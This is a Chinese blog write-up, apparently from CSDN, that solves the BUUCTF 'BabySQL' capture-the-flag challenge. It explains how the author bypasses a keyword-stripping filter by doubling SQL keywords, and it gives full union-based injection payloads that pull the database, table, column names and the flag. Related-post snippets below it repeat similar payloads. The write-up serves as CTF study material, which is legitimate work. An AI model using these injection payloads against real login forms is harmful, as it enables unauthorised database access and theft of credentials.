BUUCTF__[极客大挑战 2019]BabySQL_题解

最新推荐文章于 2024-03-03 14:21:53 发布
最新推荐文章于 2024-03-03 14:21:53 发布
阅读量399 收藏
点赞数
分类专栏: BUU做题记录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/TM_1024/article/details/107022478
版权

前言

  • 今天,居然有了想去当初中暑假辅导老师的想法,恐怖如斯。
  • 主要是时间短,弹性时间,还能有时间学点东西。同时有点收入。
  • 还是系列sql注入。

读题

  • 就没啥了,还是熟悉的界面。
  • 首先尝试1、1'、1" ,得出是单引号闭合的字符型。而且还有报错回显。
  • 然后再拿字典跑一下,返回长度有726、751、大于900的。
  • 726,提示输入账号密码,应该是被替换为空了,过滤了 union 、select、if 、or等等。
    在这里插入图片描述
  • 751 ,提示账号密码错误,就说明没被过滤
    在这里插入图片描述
  • 大于900的则提示sql语句错误,说明也没被过滤
  • 于是发现,双写可以绕过。
    在这里插入图片描述
  • 所以,开始尝试

解题

  • 先根据报错得出列数为3 在这里插入图片描述

  • 尝试获取数据库名称,成功得到数据库名称geek

    ?username=1' ununionion seselectlect 1,2,database()  %23&password=1

在这里插入图片描述

  • 读取表,有一点是information_schema.tables里也有一个被过滤的or,所以也得局部双写infoorrmation_schema.tables,成功得到表名b4bsqlgeekuser

    ?username=1' ununionion seselectlect 1,2,group_concat(table_name) frofromm infoorrmation_schema.tables wherwheree table_schema=database() %23&password=1

在这里插入图片描述

  • 同理获取两个表的字段信息,先获取表b4bsql中的内容,得到id、username、password 字段名

    ?username=1' ununionion seselectlect 1,2,group_concat(column_name) frofromm infoorrmation_schema.columns wherwheree table_name='b4bsql' %23&password=1

在这里插入图片描述

  • 直接读取内容,注意password里也有个or,直接看到flag,因为太长,所以f12即可

    ?username=1' ununionion seselectlect 1,2,group_concat(id,0x3a,username,0x3a,passwoorrd) frofromm b4bsql %23&password=1

在这里插入图片描述

  • 结束

最后

  • 题目不难,也没有新知识点,
  • 有一点是,可以根据做过的题目来扩展自己sql注入的字典。丰富内容。
  • 附上题目链接
  • 持续更新BUUCTF题解,写的不是很好,欢迎指正。
  • 最后欢迎来访个人博客
风过江南乱
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络安全练习网站大全.rar
10-16
https://blog.csdn.net/ida0918/article/detail https://www.zhihu.com/question sql注入https://redtige web:http://hackin 综合:http://www.wechal 综合性黑客game:http://www. 综合性新平台CTF:https://lab.pe 渗透:https://lab.pe CTF :https://ctf.hacker101.c https://ctf-wiki.github.io/ 安恒的平台:登录 - 明御® 攻防实验室 安恒的平台: https://www 一个综合的新平台,貌似里面二进制的题挺好:https://www 代码审计的平台(C语言):http://web 一个封装好的CTF平台:https://www.notsosecur 也是封装好的一些训练环境:https://www.vulnhub.com/# PHP安全训练平台:https://www.ripstech.com/php-sec 一个国外的CTFwiki,质量好像一般:http://ctf.forgottensec.co CTF工具库:https://www.ctft CTF指南:http:/ 等等 很多,这里就不一一列举了,对了还有一些社会工程学练习网站
BUUCTF [极客挑战 2019]BabySQL
qq_52999628的博客
08-16 910
今天来做一道sql注入题,做这类题之前一直有什么头绪,经常是各种常用的语句胡乱注入一通,所以这次想来完整记录一下整体思路,以供以后参考。 首先输入1'
BUUCTF Web [极客挑战 2019]BabySQL
网安小趴菜
08-31 422
BUUCTF Web [极客挑战 2019]BabySQL
BUUCTF [web专项15][极客挑战 2019]BabySQL
yanglinchiji的博客
11-03 131
试一遍之后会发现or可能被过滤掉了,因为只有当or的形式变成非连接符的时候才可以通过。其实这题找出来万能钥匙成功登录后就有想法了,看了一下别人的思路再做就ok了。进入后获得账号密码,用此账号密码进行登录,并在进行的同时进行注入操作。爆库,发现show databases不行,用麻烦点的。发现下面有个flag字段,选择爆数据。测试列数(密码需要自行修改)发现共有三列,开始测回显点。感觉在ctf中,再爆一下表。进入后发现是个登陆界面。查看表Flag下的字段。
[极客挑战 2019]BabySQL1
m0_73721944的博客
11-11 192
检查与您的MariaDB服务器版本对应的手册,以便在第1行'1=1#'和password='123 "附近使用正确的语法。1'ununionion seselectlect 1,2,3#&passward=1 有回显,说明有三列。1’ order by 3#&passward=123 报错发现order中的or与by都被过滤了。1'ununionion seselectlect 1,2,3,4#&passward=1 报错。打开是这样的,是之前两个题的升级版。有回显说明双写绕过是可行的。
acm.rar_浙江大学 ACM 题解
09-24
【标题】"acm.rar_浙江大学 ACM 题解" 涵盖的是关于浙江大学在ACM(国际大学生程序设计竞赛)方面的训练资料和解题思路。这些资源通常包括历年的竞赛题目、官方解答以及参赛者们分享的解题策略,旨在帮助学习者提升...
大整数的因子_题解noip_源码
10-04
在编程竞赛领域,如NOIP(全国青少年信息学奥林匹克联赛),常常会遇到处理大整数问题,本题目的核心就是探讨如何找到一个大整数的所有个位数因子。在这个问题中,我们不需要进行完整的高精度运算,而是巧妙地利用低...
leetcode题解_leetcode_leetcode题解_
09-29
它涵盖了大量来自LeetCode在线编程挑战平台的题目,旨在帮助开发者提升在算法、数据结构以及问题解决能力上的技能。LeetCode题解通常包括每道题目的详细描述、解题思路、最优解法、代码实现以及可能的优化策略。 一...
中国大学生数学建模竞赛题解_matlab
04-17
《中国大学生数学建模竞赛题解_matlab》这个资源主要关注的是如何利用MATLAB这一强大的数值计算和编程环境来解决数学建模问题。MATLAB,全称Matrix Laboratory,是为科学计算、工程分析以及数据分析等领域设计的一种...
leetcode部分题解.rar_java_leet 程序员_leetcode
09-21
这个名为"leetcode部分题解.rar_java_leet 程序员_leetcode"的压缩包,显然是一个专门为Java程序员准备的LeetCode题目详解资源,旨在帮助他们更好地应对面试中的技术挑战。 LeetCode涵盖了从基础到高级的各种问题,...
CTF学习笔记——[极客挑战 2019]BabySQL
Obs_cure的博客
02-09 1391
一、[极客挑战 2019]BabySQL 1.题目 2.解题步骤 一看就知道是之前一个系列的题,可惜并不耽误我不会做… 在尝试的时候报错是看不懂的,这里简单记述一下心路历程。SQL注入的题目自然是1' or 1=1 # 结果很奇怪 这里在看过WP才知道是把or过滤掉了才有这样的回显。很明显我注入的东西和回显出来的东西不一样。那么是什么过滤呢,从这样的回显来看,是把or替换成了空白。师傅们的做法是双写。就是改成oorr。匹配的时候会把中间的替换成空 然后外面的再组成or。双写绕过学会了) 接下来就是常
[极客挑战 2019]BabySQL
weixin_41571993的博客
10-04 691
靶场练习
buuctf [极客挑战 2019]BabySQL
qq_52671379的博客
05-10 288
buuctf [极客挑战 2019]BabySQL
BUUCTF--[GXYCTF2019]BabySQli详解
x1520700的博客
05-23 2703
题目预备知识 mysql在查询不存在的数据时会自动构建虚拟数据,一般数据要么明文,要么MD5,源码上用的是md5加密了密码 当有回显字段时,只能猜测三个字段类型分别为id,username,password 1、经过题目名提示,猜测应该是SQL注入,进入题目,发现一个登录框功能板,确信应该就是SQL注入,开始注入; 这里分享一个小知识点: sql注入可能出现的功能点 登录页面,留言板,修改信息,获取http请求头(User-agent,referer,xff)等只要是和数据库存在交...
buuctf[极客挑战 2019]BabySQL--联合注入、双写过滤
weixin_61060664的博客
01-10 1510
有回显: The used SELECT statements have a different number of columns。有回显:版本为:“ 10.3.18-MariaDB!1' or'1'='1 失败。有回显,字段名为flag。
[极客挑战 2019]BabySQL 1(BUCTF在线评测)
邓霖涛的博客
07-21 482
得到flag{ca17b523-fe92-4451-943d-3f832154b748}注意注入orselectwhereunionfrom等关键字都给过滤了。查询该表信息,注意or给替换的password里面也有or。发现成功了,系统可能就新增了一些sql关键字的过滤。一样的sql注入不行了,感觉or关键字给弄了。得到id,username,password。发现selectfrom一些关键字了。得到表名b4bsql,geekuser。打开靶机,一样的sql发现不行了。......
BUUCTF---[极客挑战 2019]BabySQL1
最新发布
2201_75556700的博客
03-03 713
1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#使用该语句查表名时发现union,select,from,where都被过滤了。8.这里有得到flag可能是我遗漏了什么,查了资料才发现,flag可能不在我们当前这个数据库里面,想到一开始,我还查询库名,不知道它有几个苦命,于是使用下面命令进行数据库库名查询。使用下面命令爆第一张表的字段。
BUUCTF [GXYCTF2019]BabySQli 1 详解!(MD5与SQL之间的碰撞)
m0_73734159的博客
11-30 1782
通过用户所在列测试,得出了存在用户admin,又得出了admin用户在第二列,也就是username字段那一列。猜测’or’关键字或’='字符被过滤。发现参数password被md5加密。大致就是传进去的值要进行md5值加密。但是要对传入的那个值进行md5值加密。网上可以随便找一个在线md5加密平台。可以得出此题的注入点是参数name。可以得出此题的注入类型为字符型注入。通过测试发现是套加密(二次加密)通过对这段SQL语句的初步判断。看着和之前做过的题很类似。在注释那里发现某种编码。repeater放包。
"复变函数题解_2019秋 学生总结"。
复平面上三个相异且不共线的点z1, z2, z3构成一个三角形∆z1z2z3。我们要求出这个三角形的外接圆圆心z0的坐标,并证明当且仅当z0 = z1+z2+z3时,∆z1z2z3为正三角形,并求出外接圆的半径r。 根据外心的定义,外接圆...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值